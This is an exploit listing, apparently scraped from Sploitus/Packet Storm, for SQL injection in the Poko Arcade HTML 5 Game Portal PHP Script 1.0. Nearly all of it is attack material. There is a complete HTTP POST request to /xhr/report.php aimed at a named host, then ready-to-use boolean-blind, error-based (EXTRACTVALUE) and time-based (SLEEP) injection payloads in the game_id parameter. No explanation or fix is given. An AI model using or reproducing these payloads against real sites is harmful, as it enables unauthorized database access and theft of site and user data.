Exploit for Poko Arcade HTML 5 Game Portal PHP Script 1.0 SQL Injection

Name: Exploit for Poko Arcade HTML 5 Game Portal PHP Script 1.0 SQL Injection
Rating: 5 (70 reviews)

2025-03-06 | CVSS 8.4

## https://sploitus.com/exploit?id=PACKETSTORM:189587
# Exploit Title: Poko Arcade HTML 5 Game Portal PHP Script v1.0 - SQL Injection
    # Date: 05-03-2025
    # Exploit Author: Buğra Enis Dönmez
    # Vendor: https://www.codester.com/items/48158/poko-arcade-html-5-game-portal-php-script
    # Tested on: Arch Linux
    # CVE: N/A
    # Special Thanks: Ahmet Ümit Bayram
    
    ### Request ###
    
    POST /xhr/report.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Accept: /
    x-requested-with: XMLHttpRequest
    Cookie: PHPSESSID=77ugk4bmujg32iur8vtthovpu2
    Content-Length: 328
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: poko.mvnstore.in
    Connection: Keep-alive
    
    game_id=1&game_name=Barbies%20Sketch&problem=e
    
    ###
    
    ### Parameter & Payloads ###
    
    Parameter: game_id (POST)
        Type: boolean-based blind
        Title: Boolean-based blind - Parameter replace (original value)
        Payload: game_id=(SELECT (CASE WHEN (5478=5478) THEN 1 ELSE (SELECT 5855 UNION SELECT 3253) END))&game_name=Barbies Sketch&problem=e
    
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
        Payload: game_id=1 AND EXTRACTVALUE(6033,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(6033=6033,1))),0x716a766b71))&game_name=Barbies Sketch&problem=e
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: game_id=1 AND (SELECT 8414 FROM (SELECT(SLEEP(5)))DwLw)&game_name=Barbies Sketch&problem=e
    
    ###